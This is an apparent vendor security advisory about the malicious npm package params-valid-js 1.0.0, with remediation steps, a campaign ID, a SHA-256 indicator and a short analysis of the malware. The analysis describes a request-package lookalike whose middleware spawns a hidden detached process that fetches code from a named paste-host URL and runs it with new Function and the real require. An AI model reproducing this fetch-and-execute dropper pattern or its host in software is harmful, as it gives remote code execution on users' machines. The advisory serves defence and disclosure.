Which versions of params-valid-js are malicious?

The following npm versions of params-valid-js are flagged malicious: 1.0.0. Treat any of these as compromised.

How do I remediate params-valid-js if I installed it?

Remove params-valid-js from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is params-valid-js part of a known attack campaign?

Yes — params-valid-js is associated with the IN-MAL-2026-006882 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect params-valid-js in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking params-valid-js and packages like it before any post-install script runs.

Malicious package

params-valid-jsnpm

Malicious code in params-valid-js (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5988

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall params-valid-js

What this malware does

params-valid-js impersonates the well-known request package (copies Mikeal Rogers' Apache-2.0 header, points bugs URL to github.com/request/request/issues, replicates request's API surface) while shipping a remote-code dropper. index.js exports a function shaped like Express middleware ((req,res,next)=>next()) as module.exports, default, and reqValidator. When invoked, the middleware calls swapJson(...) which spawns node lib/callers.js with { detached: true, stdio: 'ignore' } and child.unref() — concealing all output. lib/callers.js then performs axios.get('https://www.jsonkeeper.com/b/5IZTJ'), extracts data.Cookie, and executes the response body with new Function.constructor('require', s); handler(require);, passing the real require into the fetched code. jsonkeeper.com is an anonymous, mutable public paste host, so the attacker can swap in arbitrary Node-privileged payloads at any time. Any application that wires this lookalike into its HTTP stack triggers arbitrary remote code execution on the host.

Malicious versions

1 flagged

1.0.0

Indicators of compromise (SHA-256)

4f0f4f5cc684f7bf7b40af2f6856c7d5865f57c7492da68af6c1c194741a4629

Frequently asked questions

No. params-valid-js on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006882

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection